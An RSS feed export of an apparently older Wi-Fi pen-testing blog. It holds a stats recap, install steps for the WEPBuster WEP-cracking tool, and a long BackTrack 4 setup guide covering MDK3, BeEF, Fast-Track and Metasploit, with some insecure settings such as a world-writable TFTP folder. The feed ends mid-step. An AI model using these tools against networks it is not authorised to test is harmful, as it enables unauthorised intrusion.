<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>All Your Wireless Belongs To Us</title>
	<atom:link href="http://wifi0wn.wordpress.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://wifi0wn.wordpress.com</link>
	<description>Wifi(IEEE 802.11 A/B/G/N/I Security And Pen-Testing)</description>
	<lastBuildDate>Thu, 06 Oct 2011 19:41:37 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.com/</generator>
<cloud domain='wifi0wn.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://0.gravatar.com/blavatar/45a3ad3dc503b6117edca5aee388f81e?s=96&#038;d=http%3A%2F%2Fs2.wp.com%2Fi%2Fbuttonw-com.png</url>
		<title>All Your Wireless Belongs To Us</title>
		<link>http://wifi0wn.wordpress.com</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://wifi0wn.wordpress.com/osd.xml" title="All Your Wireless Belongs To Us" />
	<atom:link rel='hub' href='http://wifi0wn.wordpress.com/?pushpress=hub'/>
		<item>
		<title>2010 Blog review(Blog Review &amp; Appraisal From WordPress Team)</title>
		<link>http://wifi0wn.wordpress.com/2011/01/02/2010-blog-reviewblog-review-appraisal-from-wordpress-team/</link>
		<comments>http://wifi0wn.wordpress.com/2011/01/02/2010-blog-reviewblog-review-appraisal-from-wordpress-team/#comments</comments>
		<pubDate>Sun, 02 Jan 2011 16:24:25 +0000</pubDate>
		<dc:creator>wifi0wn</dc:creator>
				<category><![CDATA[Wifi-Hacking]]></category>

		<guid isPermaLink="false">http://wifi0wn.wordpress.com/?p=274</guid>
		<description><![CDATA[The stats helper monkeys at WordPress.com mulled over how this blog did in 2010, and here&#8217;s a high level summary of its overall blog health: The Blog-Health-o-Meter™ reads Wow. Crunchy numbers The Louvre Museum has 8.5 million visitors per year. This blog was viewed about 80,000 times in 2010. If it were an exhibit at [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=wifi0wn.wordpress.com&amp;blog=4155177&amp;post=274&amp;subd=wifi0wn&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>The stats helper monkeys at WordPress.com mulled over how this blog did in 2010, and here&#8217;s a high level summary of its overall blog health:</p>
<p><img style="border:1px solid #ddd;background:#f5f5f5;padding:20px;" src="http://s0.wp.com/i/annual-recap/meter-healthy5.gif" alt="Healthy blog!" width="250" height="183" /></p>
<p>The <em>Blog-Health-o-Meter™</em> reads Wow.</p>
<h2>Crunchy numbers</h2>
<p><a href="http://wifi0wn.files.wordpress.com/2008/07/image014.jpg"><img style="max-height:230px;float:right;border:1px solid #ddd;background:#fff;margin:0 0 1em 1em;padding:6px;" src="http://wifi0wn.files.wordpress.com/2008/07/image014.jpg?w=288" alt="Featured image" /></a></p>
<p>The Louvre Museum has 8.5 million visitors per year.  This blog was viewed about <strong>80,000</strong> times in 2010. If it were an exhibit at The Louvre Museum, it would take 3 days for that many people to see it.</p>
<p>&nbsp;</p>
<p>In 2010, there was <strong>1</strong> new post, growing the total archive of this blog to 15 posts. There were <strong>3</strong> pictures uploaded, taking up a total of 357kb.</p>
<p>The busiest day of the year was December 5th with <strong>355</strong> views. The most popular post that day was <a style="color:#08c;" href="http://wifi0wn.wordpress.com/wepwpawpa2-cracking-dictionary/">WEP/WPA/WPA2 Cracking Dictionary</a>.</p>
<h2>Where did they come from?</h2>
<p>The top referring sites in 2010 were <strong>wifi0wn.co.cc</strong>, <strong>google.com</strong>, <strong>en.wordpress.com</strong>, <strong>hackforums.net</strong>, and <strong>search.conduit.com</strong>.</p>
<p>Some visitors came searching, mostly for <strong>wpa dictionary</strong>, <strong>wpa dictionary download</strong>, <strong>dictionary wpa</strong>, <strong>wpa2 dictionary</strong>, and <strong>wpa dictionaries</strong>.</p>
<h2>Attractions in 2010</h2>
<p>These are the posts and pages that got the most views in 2010.</p>
<div style="clear:left;float:left;font-size:24pt;line-height:1em;margin:-5px 10px 20px 0;">1</div>
<p><a style="margin-right:10px;" href="http://wifi0wn.wordpress.com/wepwpawpa2-cracking-dictionary/">WEP/WPA/WPA2 Cracking Dictionary</a> <span style="color:#999;font-size:8pt;">July 2008</span><br />
12 comments</p>
<div style="clear:left;float:left;font-size:24pt;line-height:1em;margin:-5px 10px 20px 0;">2</div>
<p><a style="margin-right:10px;" href="http://wifi0wn.wordpress.com/wifi-antenna-cards/">Wifi cards &amp; Antenna</a> <span style="color:#999;font-size:8pt;">July 2008</span><br />
4 comments</p>
<div style="clear:left;float:left;font-size:24pt;line-height:1em;margin:-5px 10px 20px 0;">3</div>
<p><a style="margin-right:10px;" href="http://wifi0wn.wordpress.com/2008/07/19/airsnarf-the-rogue-access-pointbacktrack-3-as-fake-ap/">Airsnarf-The Rogue Access-Point(BackTrack 3 As Fake AP)</a> <span style="color:#999;font-size:8pt;">July 2008</span><br />
3 comments</p>
<div style="clear:left;float:left;font-size:24pt;line-height:1em;margin:-5px 10px 20px 0;">4</div>
<p><a style="margin-right:10px;" href="http://wifi0wn.wordpress.com/2009/02/11/backtrack-4-beta-windows-7-ultimate-dual-boot/">Back|Track 4 beta &amp; Windows 7 Ultimate Dual Boot</a> <span style="color:#999;font-size:8pt;">February 2009</span></p>
<div style="clear:left;float:left;font-size:24pt;line-height:1em;margin:-5px 10px 20px 0;">5</div>
<p><a style="margin-right:10px;" href="http://wifi0wn.wordpress.com/wifi-tools-software/">Wireless Tools &amp; Software</a> <span style="color:#999;font-size:8pt;">July 2008</span><br />
3 comments</p>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/wifi0wn.wordpress.com/274/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/wifi0wn.wordpress.com/274/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/wifi0wn.wordpress.com/274/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/wifi0wn.wordpress.com/274/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/wifi0wn.wordpress.com/274/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/wifi0wn.wordpress.com/274/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/wifi0wn.wordpress.com/274/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/wifi0wn.wordpress.com/274/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/wifi0wn.wordpress.com/274/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/wifi0wn.wordpress.com/274/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/wifi0wn.wordpress.com/274/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/wifi0wn.wordpress.com/274/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/wifi0wn.wordpress.com/274/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/wifi0wn.wordpress.com/274/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=wifi0wn.wordpress.com&amp;blog=4155177&amp;post=274&amp;subd=wifi0wn&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://wifi0wn.wordpress.com/2011/01/02/2010-blog-reviewblog-review-appraisal-from-wordpress-team/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/0b82c98dce39677fe0216f2cae2a7f45?s=96&#38;d=&#38;r=G" medium="image">
			<media:title type="html">wifi0wn</media:title>
		</media:content>

		<media:content url="http://s0.wp.com/i/annual-recap/meter-healthy5.gif" medium="image">
			<media:title type="html">Healthy blog!</media:title>
		</media:content>

		<media:content url="http://wifi0wn.files.wordpress.com/2008/07/image014.jpg?w=288" medium="image">
			<media:title type="html">Featured image</media:title>
		</media:content>
	</item>
		<item>
		<title>Wepbuster-The Automatic WEP Assessment Tool</title>
		<link>http://wifi0wn.wordpress.com/2010/02/07/wepbuster-the-automatic-wep-assessment-tool/</link>
		<comments>http://wifi0wn.wordpress.com/2010/02/07/wepbuster-the-automatic-wep-assessment-tool/#comments</comments>
		<pubDate>Sun, 07 Feb 2010 08:28:51 +0000</pubDate>
		<dc:creator>wifi0wn</dc:creator>
				<category><![CDATA[Wifi-Hacking]]></category>

		<guid isPermaLink="false">http://wifi0wn.wordpress.com/?p=246</guid>
		<description><![CDATA[Hello to all the dear visitor of this blog.here is step by step using of wepbuster tool.first time while installation,I faced minor technical issues which I resolved later after little bit searching. thanks to markjayson.alvarez for making such wonderful tool. REQUIREMENTS:                             [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=wifi0wn.wordpress.com&amp;blog=4155177&amp;post=246&amp;subd=wifi0wn&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Hello to all the dear visitor of this blog.here is step by step using of wepbuster tool.first time while installation,I faced minor technical issues which I resolved later after little bit searching.</p>
<p>thanks to <a href="http://code.google.com/u/markjayson.alvarez/">markjayson.alvarez</a> for making such wonderful tool.</p>
<p><a name="WEPBuster_1.0"><strong>REQUIREMENTS:</strong> </a></p>
<pre><a name="WEPBuster_1.0">                                                                         
  - aircrack-ng 1.0                      
                                                                                 
  - perl installation with standard libraries (threading support)                
     - perl modules (http://search.cpan.org)                                    
        - Term::ReadKey                                                  
        - Expect.pm
        - Getopt::Long
        - File::Slurp
        - Number::Range
        - Algorithm::Permute
        - Pod::Usage
                                                                                                                                                 
  - macchanger   (www.alobbs.com/macchanger)                                    
                                                                                 
  - miscellaneous unix programs                                          
        - ifconfig, iwconfig, rm, pkill, stty, cp, touch, mv, route, ping,      
         dhclient, netstat</a></pre>
<p>download the source code from wepbuster project site here.</p>
<p><a href="http://wepbuster.googlecode.com/files/wepbuster-1.0_beta-0.7.tgz" target="_blank">Wepbuster Download</a></p>
<p>or</p>
<p>wget http://wepbuster.googlecode.com/files/wepbuster-1.0_beta-0.7.tgz</p>
<p>Download dependencies</p>
<p>wget http://search.cpan.org/CPAN/authors/id/J/JS/JSTOWE/TermReadKey-2.30.tar.gz<br />
wget http://search.cpan.org/CPAN/authors/id/R/RG/RGIERSIG/Expect-1.21.tar.gz<br />
wget http://search.cpan.org/CPAN/authors/id/J/JV/JV/Getopt-Long-2.38.tar.gz<br />
wget http://search.cpan.org/CPAN/authors/id/D/DR/DROLSKY/File-Slurp-9999.13.tar.gz<br />
wget http://search.cpan.org/CPAN/authors/id/L/LA/LARRYSH/Number-Range-0.07.tar.gz<br />
wget http://search.cpan.org/CPAN/authors/id/E/ED/EDPRATOMO/Algorithm-Permute-0.12.tar.gz<br />
wget http://search.cpan.org/CPAN/authors/id/M/MA/MAREKR/Pod-Parser-1.38.tar.gz</p>
<p>tar -zxvf Algorithm-Permute-0.12.tar.gz<br />
cd Algorithm-Permute-0.12<br />
perl Makefile.PL<br />
make<br />
make install</p>
<p>tar -zxvf Expect-1.21.tar.gz<br />
cd Expect-1.21<br />
perl Makefile.PL<br />
make<br />
make install</p>
<p>tar -zxvf File-Slurp-9999.13.tar.gz<br />
cd File-Slurp-9999.13<br />
perl Makefile.PL<br />
make<br />
make install</p>
<p>tar -zxvf Getopt-Long-2.38.tar.gz<br />
cd Getopt-Long-2.38<br />
perl Makefile.PL<br />
make<br />
make install</p>
<p>tar -zxvf Number-Range-0.07.tar.gz<br />
cd Number-Range-0.07<br />
perl Makefile.PL<br />
make<br />
make install</p>
<p>tar -zxvf Pod-Parser-1.38.tar.gz<br />
cd Pod-Parser-1.38<br />
perl Makefile.PL<br />
make<br />
make install</p>
<p>tar -zxvf TermReadKey-2.30.tar.gz<br />
cd TermReadKey-2.30<br />
perl Makefile.PL<br />
make<br />
make install</p>
<p>now you are ready to install wepbuster as all dependencies are satisfied now<br />
tar -zxvf wepbuster-1.0_beta-0.7.tgz<br />
cd wepbuster-1.0_beta</p>
<p>cp wepbuster /usr/bin<br />
.wepbuster</p>
<p>by default it scans according to US standard e.g. channel 1 6 11.to change this default behavior &amp; to force scanning on channels.edit</p>
<p>kwrite wepbuster</p>
<p>find section</p>
<p>my $country = &#8216;US&#8217;; &amp; replace with my $country = &#8216;all&#8217;;</p>
<p>save &amp; exit &amp; rerun wepbuster</p>
<p>Normal usage commands:</p>
<pre>  perl wepbuster [channel(s)]
  perl wepbuster [sort | connect] [hostname/ip address]
  perl wepbuster permute [OPTIONS]
  or
  perl wepbuster --help | --man for list of all supported options.

<a name="WEPBuster_1.0" href="http://code.google.com/p/wepbuster/" target="_blank"><a href="http://code.google.com/p/wepbuster/" target="_blank">Main project page</a>
</a>
<a name="WEPBuster_1.0" href="http://code.google.com/p/wepbuster/" target="_blank"></a></pre>
<br />  <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/wifi0wn.wordpress.com/246/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/wifi0wn.wordpress.com/246/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/wifi0wn.wordpress.com/246/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/wifi0wn.wordpress.com/246/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/wifi0wn.wordpress.com/246/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/wifi0wn.wordpress.com/246/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/wifi0wn.wordpress.com/246/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/wifi0wn.wordpress.com/246/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/wifi0wn.wordpress.com/246/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/wifi0wn.wordpress.com/246/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/wifi0wn.wordpress.com/246/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/wifi0wn.wordpress.com/246/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/wifi0wn.wordpress.com/246/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/wifi0wn.wordpress.com/246/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=wifi0wn.wordpress.com&amp;blog=4155177&amp;post=246&amp;subd=wifi0wn&amp;ref=&amp;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://wifi0wn.wordpress.com/2010/02/07/wepbuster-the-automatic-wep-assessment-tool/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/0b82c98dce39677fe0216f2cae2a7f45?s=96&#38;d=&#38;r=G" medium="image">
			<media:title type="html">wifi0wn</media:title>
		</media:content>
	</item>
		<item>
		<title>BackTrack 4 Beta Menu &amp; Bugs FIX (Services/Mysql/Toolset)</title>
		<link>http://wifi0wn.wordpress.com/2009/03/06/backtrack-4-beta-menu-bugs-fix-servicesmysqltoolset/</link>
		<comments>http://wifi0wn.wordpress.com/2009/03/06/backtrack-4-beta-menu-bugs-fix-servicesmysqltoolset/#comments</comments>
		<pubDate>Fri, 06 Mar 2009 07:36:04 +0000</pubDate>
		<dc:creator>wifi0wn</dc:creator>
				<category><![CDATA[Wifi-Hacking]]></category>

		<guid isPermaLink="false">http://wifi0wn.wordpress.com/?p=230</guid>
		<description><![CDATA[marketing This menufix took a lot of time to prepare and to check.there are 2 things in this tutorial.one for spoon kiddies &#38; another who wants to know,what actual is going on.I mean step by step fixing.for automatic fixing the menu.download the package &#38; copy the applications-kmenuedit.menu from package &#38; overwrite to ~/.config/menus/applications-kmenuedit.menu &#38; copy [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=wifi0wn.wordpress.com&amp;blog=4155177&amp;post=230&amp;subd=wifi0wn&amp;ref=&amp;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p> <!-- Begin BidVertiser code --></p>
<p><a href="http://www.bidvertiser.com/bdv/BidVertiser/bdv_advertiser.dbm">marketing</a><br />
<!-- End BidVertiser code --><br />
This menufix took a lot of time to prepare and to check.there are 2 things in this tutorial.one for spoon kiddies &amp; another who wants to know,what actual is going on.I mean step by step fixing.for automatic fixing the menu.download the package &amp; copy the <strong>applications-kmenuedit.menu</strong> from package &amp; overwrite  to<strong> ~/.config/menus/applications-kmenuedit.menu</strong> &amp; copy <strong>applications</strong> folder &amp; overwrite to <strong>~/.local/share/applications/</strong></p>
<p>I have installed the following packages too and fixed menu according to them as I was missing some of interesting stuff from BT3.these things are optional to install &amp; may vary on your wish.</p>
<p>apt-get install kppp<br />
snort(Don&#8217;t use apt-get as it will install old version.2.7)<br />
Nessus 3.2.1<br />
apt-get install bluez(Those missing bluetooth)</p>
<p>from terminal type kmenuedit</p>
<p><strong>expand BackTrack menu</strong></p>
<blockquote><p>Vulnerability Identification<br />
All<br />
smbclient.py<br />
(For fixing this copy the smbclient.py to /usr/bin</p></blockquote>
<p><strong>expand BackTrack menu</strong></p>
<blockquote>
<p style="text-align:left;">VOIP<br />
All<br />
Erase_registrations<br />
Command:./erase_registrations;sudo -s</p></blockquote>
<p style="text-align:left;"><strong>expand BackTrack menu<br />
</strong>apt-get install apt-get install gcc-4.2<br />
Press Y<br />
Download MDK3<br />
wget <a href="http://homepages.tu-darmstadt.de/%7Ep_larbig/wlan/mdk3-v5.tar.bz2" target="_blank">http://homepages.tu-darmstadt.de/~p_larbig/wlan/mdk3-v5.tar.bz2</a><br />
extract the mdk3-v5.tar.bz2<br />
cd mdk3-v5/osdep<br />
kwrite common.mak<br />
find the lines<br />
<strong>CC        = $(TOOL_PREFIX)gcc &amp; change to CC        = $(TOOL_PREFIX)gcc-4.2</strong><br />
save &amp; exit<br />
cd ..<br />
make &amp;&amp; make install</p>
<blockquote>
<p style="text-align:left;">Radio Network Analysis<br />
80211<br />
All<br />
ctrl+n<br />
type MDK3<br />
command:/usr/local/sbin/mdk3;sudo -s<br />
select Run in terminal</p>
<p>Radio Network Analysis<br />
80211<br />
Cracking<br />
ctrl+n<br />
type MDK3<br />
command:/usr/local/sbin/mdk3;sudo -s<br />
select Run in terminal</p></blockquote>
<p style="text-align:left;"><strong>expand BackTrack menu</strong></p>
<blockquote>
<p style="text-align:left;">Privilege Escalation<br />
All<br />
ctrl+n<br />
type Etherape<br />
command:etherape;sudo -s</p></blockquote>
<p style="text-align:left;"><strong>expand BackTrack menu</strong></p>
<blockquote>
<p style="text-align:left;">Privilege Escalation<br />
Sniffers<br />
ctrl+n<br />
type Etherape<br />
command:etherape;sudo -s</p></blockquote>
<p style="text-align:left;"><strong>expand BackTrack menu</strong></p>
<blockquote>
<p style="text-align:left;"><strong> </strong>Miscellaneous<br />
usbview<br />
Error:cannot open the file /proc/bus/usb/devices<br />
FIX:add these lines to /etc/fstab<br />
none     /proc/bus/usb     usbfs    defaults<br />
save &amp; exit</p></blockquote>
<p style="text-align:left;"><strong>expand BackTrack menu</strong></p>
<blockquote>
<p style="text-align:left;">Install flash player for firefox</p>
</blockquote>
<blockquote>
<p style="text-align:left;">wget http://fpdownload.macromedia.com/get/flashplayer/current/install_flash_player_10_linux.deb<br />
dpkg -i install_flash_player_10_linux.deb<br />
Cut &amp; paste the /pentest/web/swfintruder to /var/www/swfintruder<br />
copy &amp; paste the /var/www/swfintruder/testSwf/test.swf to /var/www/swfintruder/<br />
Miscellaneous<br />
swfintruder<br />
command:firefox http://127.0.0.1/swfintruder</p>
<p>launch the tool and in flash movie:type http://127.0.0.1/swfintruder/test.swf &amp; hit load<br />
now further you can put the swf files in /var/www/swfintruder &amp; can test</p></blockquote>
<p><strong>expand BackTrack menu</strong></p>
<blockquote><p>Miscellaneous<br />
ctrl+n<br />
RFIDIOt<br />
command:ls;sudo -s<br />
Work path:/pentest/rfid/RFIDIOt-0.1w<br />
checkmark Run in terminal</p></blockquote>
<p><strong>expand documents-&gt;All</strong></p>
<blockquote><p>Ctrl+n<br />
type wiki.remote-exploit.org (wait untill new bt4 wiki launches)<br />
command:konqueror http://wiki.remote-exploit.org</p>
<p>Ctrl+n<br />
type www.isecom.org<br />
command:konqueror http://www.isecom.org/osstmm</p>
<p>ctrl+n<br />
type www.oissg.org<br />
command:konqueror http://www.oissg.org/content/view/71/71</p></blockquote>
<p><strong>expand documents-&gt;BackTrack</strong></p>
<blockquote><p>ctrl+n<br />
type www.remote-exploit.org<br />
command:konqueror http://www.remote-exploit.org</p>
<p>ctrl+n<br />
type forums.remote-exploit.org<br />
command:konqueror http://forums.remote-exploit.org</p></blockquote>
<p><strong>expand docuements-&gt;OSSTMM </strong></p>
<blockquote><p>Ctrl+n<br />
type www.isecom.org<br />
command:konqueror http://www.isecom.org/osstmm</p></blockquote>
<p><strong>expand documents-&gt;ISSAF</strong></p>
<blockquote><p><strong> </strong>type www.oissg.org<br />
command:konqueror http://www.oissg.org/content/view/71/71</p></blockquote>
<p><strong>expand Editors</strong></p>
<blockquote><p>ctrl+n<br />
type kwrite<br />
command:kwrite %U</p>
<p>ctrl+n<br />
type kate<br />
command:kate %U</p>
<p>ctrl+n<br />
type nedit<br />
command:nedit %U</p></blockquote>
<p><strong>expand Internet</strong></p>
<blockquote><p>ctrl+n<br />
type Network  Manager<br />
command:/etc/init.d/NetworkManager;sudo -s</p>
<p>ctrl+n<br />
type vncviewer<br />
command:vncviewer</p></blockquote>
<p><strong>expand Services</strong></p>
<blockquote><p>Right click services &amp; choose new submenu<br />
type Nessus</p>
<p>ctrl+n<br />
type Start Nessus<br />
command:/etc/init.d/nessusd start;sudo -s</p>
<p>ctrl+n<br />
type Stop Nessus<br />
command:/etc/init.d/nessud stop;sudo -s</p>
<p>For using BeEF service download beef:<br />
wget http://www.bindshell.net/tools/beef/beef-v0.3.2.tar.gz<br />
extract to /var/www/<br />
copy the supplied setup-beef.sh to /usr/bin folder<br />
test using http://127.0.0.1/beef(run apache2 first)</p>
<p>select BEEF<br />
ctrl+n<br />
Setup BeEF<br />
command:setup-beef.sh;sudo -s<br />
checkmark Run in terminal</p>
<p>select HTTPD<br />
ctrl+n<br />
type Start HTTPD<br />
command:service apache2 start;sudo -s</p>
<p>ctrl+n<br />
type Stop HTTPD<br />
command:service apache2 stop;sudo -s</p>
<p>ctrl+n<br />
type Restart HTTPD<br />
command:/etc/init.d/apache2 restart;sudo -s</p>
<p>For using service mysql do this<br />
delete the folder mysql in /var/lib(e.g.the /var/lib/mysql folder)<br />
then run<br />
dpkg-reconfigure mysql-server-5.0<br />
Enter the password you want to use for root user.</p>
<p>select Mysql<br />
ctrl+n<br />
type Start Mysql<br />
command:service mysql start;sudo -s</p>
<p>ctrl+n<br />
type Stop Mysql<br />
command:service mysql stop;sudo -s</p>
<p>ctrl+n<br />
type Restart mysql<br />
command:service mysql restart;sudo -s</p>
<p>select snort<br />
ctrl+n<br />
type Snort<br />
command:snort;sudo -s</p>
<p>for using SSH Services first use<br />
sshd-generate</p>
<p>select SSH<br />
ctrl+n<br />
Start SSHD<br />
command:/bin/bash /etc/init.d/ssh start;sudo -s</p>
<p>ctrl+n<br />
Stop SSHD<br />
command:/bin/bash /etc/init.d/ssh stop;sudo -s</p>
<p>for using TFTP Services<br />
mkdir /var/lib/tftpboot<br />
chmod 777 /var/lib/tftpboot</p>
<p>select TFTPD<br />
ctrl+n<br />
Start TFTPD<br />
command:/usr/sbin/inetd;sudo -s</p>
<p>ctrl+n<br />
Stop TFTPD<br />
command:killall -e /usr/sbin/inetd;sudo -s</p>
<p>select VNC<br />
ctrl+n<br />
Start VNC Server<br />
command:vncserver;sudo -s</p>
<p>Stop VNC Server<br />
command:vncserver -kill :1;sudo -s</p></blockquote>
<p><strong>expand graphics</strong></p>
<blockquote><p>ctrl+n<br />
type kghostview<br />
command:kghostview %u -caption &#8220;%c&#8221; %i %m</p></blockquote>
<p><strong>expand Utilities</strong></p>
<blockquote><p>ctrl+n<br />
type oclock<br />
command:oclock;sudo -s</p></blockquote>
<p><strong>expand utilities-&gt;desktop</strong></p>
<blockquote><p>ctrl+n<br />
type kpager<br />
command:kpager;sudo -s</p>
<p>ctrl+n<br />
type Clipboard Tool<br />
command:klipper;sudo -s</p></blockquote>
<p><strong>right click Utilities &amp; choose new submenu</strong></p>
<blockquote><p>type peripherals<br />
ctrl+n<br />
type FAX Utility<br />
command:kdeprintfax;sudo -s</p></blockquote>
<p><strong>expand X-Utilities</strong></p>
<blockquote><p>ctrl+n<br />
type X Calc<br />
command:xcalc;sudo -s</p>
<p>ctrl+n<br />
type X Clock<br />
command:xclock;sudo -s</p>
<p>ctrl+n<br />
type X Clipboard<br />
command:xclipboard;sudo -s</p>
<p>ctrl+n<br />
type X Console<br />
command:xconsole;sudo -s</p>
<p>ctrl+n<br />
type X Editor<br />
command:xedit %f;sudo -s</p>
<p>ctrl+n<br />
type X Kill<br />
command:xkill;sudo -s</p>
<p>ctrl+n<br />
type X Load<br />
command:xload;sudo -s</p>
<p>ctrl+n<br />
type X Magnifier<br />
command:xmag</p></blockquote>
<p>click on <strong>File menu-&gt;new Item</strong></p>
<blockquote><p>type Find File/Folders<br />
command:kfind;sudo -s</p></blockquote>
<p>click on <strong>File menu-&gt;new submenu</strong></p>
<blockquote><p>type Toys<br />
ctrl+n<br />
type X Eyes<br />
command:xeyes;sudo -s</p></blockquote>
<p><strong>ctrl+s &amp; exit</strong></p>
<p>Those who want<strong> Ettercap GUI</strong> perform this</p>
<blockquote><p>apt-get install ettercap-gtk<br />
press Y(Yes I know it will try to remove fasttrack as fasttrack is depend on ettercap)<br />
cd /pentest/exploits<br />
svn co http://svn.thepentest.com/fasttrack/<br />
cd fasttrack<br />
python setup.py install (Now answer some of the Q accordingly &amp; you have done)<br />
./fasttrack -g &amp; ettercap -G both working correctly.</p></blockquote>
<p>I have not used any other tools except the one&#8217;s which are included by default in BT 4 Beta.extra tools have been mentioned above only.if still something left then please let me know.thanks for reading this.below is some files which you need to download.Please <a href="http://www.mediafire.com/?emdi2gwtgte" target="_blank">CLICK </a>here.<br />
<strong><br />
updating apt-get update I was getting following error</strong></p>
<blockquote><p>: GPG error: http://ppa.launchpad.net intrepid Release: The following signatures couldn&#8217;t be verified because the public key is not available: NO_PUBKEY CB2F6C86F77B1CA9</p>
<p>Solution:<br />
Add the GPG signing key:<br />
wget http://apt.pearsoncomputing.net/public.gpg<br />
sudo apt-key add public.gpg</p>
<p>now run apt-get update</p></blockquote>
<p><strong>&#8220;cannot lock media/.hal-mtab&#8221; .while try to access the device</strong></p>
<blockquote><p>Make appropriate directory e.g. /mnt/sda1 &amp; then put automount entry in /etc/fstab<br />
mkdir /media<br />
touch /media/.hal-mtab<strong><br />
</strong></p></blockquote>
<p><strong>edb: error while loading shared libraries: libQtGui.so.4: cannot open shared object file: No such file or directory</strong></p>
<blockquote><p>Evan&#8217;s debugger uses qt libraries and thus missing dependencies.here is how to do<br />
download getlibs<br />
wget http://www.boundlesssupremacy.com/Cappy/getlibs/getlibs-all.deb<br />
dpkg -i getlibs-all.deb<br />
getlibs libQtGui.so.4 (it will check for dependencies &amp; packages needed)<br />
Press Y<br />
now run edb</p></blockquote>
<p><strong>MYSQL Error in db_create Metasploit</strong></p>
<blockquote><p>msf &gt; load db_mysql[*] Successfully loaded plugin: db_mysql</p>
<p>msf &gt; db_create</p>
<p>mysqladmin: connect to server at &#8216;localhost&#8217; failed<br />
error: &#8216;Access denied for user &#8216;root&#8217;@'localhost&#8217; (using password: NO)&#8217;<br />
ERROR 1045 (28000): Access denied for user &#8216;root&#8217;@'localhost&#8217; (using password: NO)[*] Database creation complete (check for errors)</p>
<p>msf &gt; db_import_nmap_xml xpsp2.xml<br />
[-] Error while running command db_import_nmap_xml: Access denied for user &#8216;root&#8217;@'localhost&#8217; (using password: NO)<br />
Kindly check the Entry above for fixing Mysql-server 5.0 &amp; just don&#8217;t assign any password while dpkg-reconfigure</p></blockquote>
<p><strong>Inguma GUI FIX</strong></p>
<blockquote><p>python ingumagui.py<br />
Traceback (most recent call last):<br />
File &#8220;ingumagui.py&#8221;, line 28, in &lt;module&gt;<br />
from qt import *<br />
ImportError: No module named qt<br />
apt-get install python-qt3<strong><br />
</strong></p></blockquote>
<p><strong> </strong></p>
<p><strong>SSHatter Parallel-ForkManager &amp; Net-SSH-Perl Dependency FIX</strong></p>
<blockquote><p><strong>t</strong>hose who installed SSHatter<br />
root@ThUNdErbOlt:/pentest/password/SSHatter-0.6/src# ./SSHatter.pl<br />
Can&#8217;t locate Parallel/ForkManager.pm in @INC (@INC contains: /etc/perl /usr/local/              lib/perl/5.10.0 /usr/local/share/perl/5.10.0 /usr/lib/perl5 /usr/share/perl5 /usr/              lib/perl/5.10 /usr/share/perl/5.10 /usr/local/lib/site_perl .) at ./SSHatter.pl li              ne 33.<br />
BEGIN failed&#8211;compilation aborted at ./SSHatter.pl line 33.<br />
FIX<br />
wget http://search.cpan.org/CPAN/authors/id/D/DL/DLUX/Parallel-ForkManager-0.7.5.tar.gz<br />
